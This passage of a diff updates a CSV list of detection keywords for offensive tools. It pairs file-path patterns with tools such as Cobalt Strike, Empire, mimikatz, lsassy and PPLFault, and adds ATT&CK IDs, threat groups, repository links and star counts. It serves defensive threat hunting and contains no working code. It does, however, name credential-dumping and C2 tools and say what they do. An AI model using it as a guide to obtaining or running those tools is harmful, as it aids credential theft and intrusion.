signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/download-stager.js*","offensive_tool_keyword","empire","Starkiller is a Frontend for Powershell Empire. It is a web application written in VueJS","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Starkiller","1","1","N/A","N/A","10","1126","186","2023-08-27T18:33:49Z","2020-03-09T05:48:58Z" "*/dpap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/dpipe.sh*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tools","https://github.com/basharkey/CVE-2022-0847-dirty-pipe-checker","1","1","N/A","N/A","1","55","28","2023-06-14T23:25:46Z","2022-03-08T17:13:24Z" @@ -3417,52 +3426,53 @@ "*/drda-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/drda-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Drones/SleepDialogue.razor*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" -"*/drunkpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/drop-sc.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/drunkpotato*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/dsniff.c*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. SymantecpcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" "*/dsniff.services*","offensive_tool_keyword","dsniff","password sniffer. handles FTP. Telnet. SMTP. HTTP. POP. poppass. NNTP. IMAP. SNMP. LDAP. Rlogin. RIP. OSPF. PPTP MS-CHAP. NFS. VRRP. YP/NIS. SOCKS. X11. CVS. IRC. AIM. ICQ. Napster. PostgreSQL. Meeting Maker. Citrix ICA. Symantec pcAnywhere. NAI Sniffer. Microsoft SMB. Oracle SQL*Net. Sybase and Microsoft SQL auth info. dsniff automatically detects and minimally parses each application protocol. only saving the interesting bits. and uses Berkeley DB as its output file format. only logging unique authentication attempts. full TCP/IP reassembly is provided by libnids(3) (likewise for the following tools as well).","T1110 - T1040 - T1074.001 - T1555.002 - T1555.003","TA0001 - TA0002 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/tecknicaltom/dsniff","1","0","N/A","N/A","2","167","44","2010-06-29T05:53:39Z","2010-06-23T13:11:11Z" -"*/ducky.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*/DueDLLigence.git*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","441","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*/ducky.py","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1101","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/DueDLLigence.git*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","1","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" "*/dukes_apt29.profile*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" "*/dump_lsass.*","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" -"*/DumpCerts*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*/DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10978","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" -"*/dumpert.c*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*/Dumpert/*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1312","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" -"*/dumpmethod/*.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-07-19T10:46:59Z","2019-12-03T14:03:41Z" -"*/DumpShellcode/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","410","66","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" +"*/DumpCerts*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/DumpCreds*","offensive_tool_keyword","mimikatz","Invoke-Mimikatz.ps1 script argument","T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*/dumpert.c*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*/Dumpert/*","offensive_tool_keyword","cobaltstrike","LSASS memory dumper using direct system calls and API unhooking.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/Dumpert/tree/master/Dumpert-Aggressor","1","1","N/A","10","10","1314","237","2021-01-05T08:58:26Z","2019-06-17T18:22:01Z" +"*/dumpmethod/*.py","offensive_tool_keyword","lsassy","Extract credentials from lsass remotely","T1003.001 - T1021.001 - T1021.002 - T1555.003","TA0006","N/A","N/A","Credential Access","https://github.com/Hackndo/lsassy","1","1","N/A","N/A","10","1745","232","2023-10-04T19:25:30Z","2019-12-03T14:03:41Z" +"*/DumpShellcode/*","offensive_tool_keyword","PPLFault","Exploits a TOCTOU in Windows Code Integrity to achieve arbitrary code execution as WinTcb-Light then dump a specified process.","T1055 - T1078 - T1112 - T1553 - T1555","TA0001 - TA0002 - TA0003 - TA0005 - TA0011","N/A","N/A","Credential Access","https://github.com/gabriellandau/PPLFault","1","1","N/A","N/A","5","411","68","2023-10-03T20:00:34Z","2022-09-22T19:39:24Z" "*/DumpsterFire/*","offensive_tool_keyword","DumpsterFire","The DumpsterFire Toolset is a modular. menu-driven. cross-platform tool for building repeatable. time-delayed. distributed security events. Easily create custom event chains for Blue Team drills and sensor / alert mapping. Red Teams can create decoy incidents. distractions. and lures to support and scale their operations. Turn paper tabletop exercises into controlled live fire range events. Build event sequences (narratives) to simulate realistic scenarios and generate corresponding network and filesystem artifacts.","T1175 - T1176 - T1589","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tools","https://github.com/TryCatchHCF/DumpsterFire","1","0","N/A","N/A","10","934","152","2020-05-27T15:00:56Z","2017-10-05T23:44:54Z" "*/dumpweb.log*","offensive_tool_keyword","chromedump","ChromeDump is a small tool to dump all JavaScript and other ressources going through the browser","T1059.007 - T1114.001 - T1518.001 - T1552.002","TA0005 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/g4l4drim/ChromeDump","1","1","N/A","N/A","1","54","1","2023-06-30T09:07:59Z","2023-01-26T20:44:06Z" "*/dumpXor.exe*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*/dumpXor/dumpXor*","offensive_tool_keyword","cobaltstrike","dump lsass","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/seventeenman/CallBackDump","1","1","N/A","10","10","510","74","2023-07-20T09:03:33Z","2022-09-25T08:29:14Z" "*/dunderhay/CVE-202*","offensive_tool_keyword","POC","exploit code for F5-Big-IP (CVE-2020-5902)","T1210","TA0008","N/A","N/A","Exploitation tools","https://github.com/dunderhay/CVE-2020-5902","1","1","N/A","N/A","1","37","8","2023-10-03T01:42:19Z","2020-07-06T04:03:58Z" "*/duplicates.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" 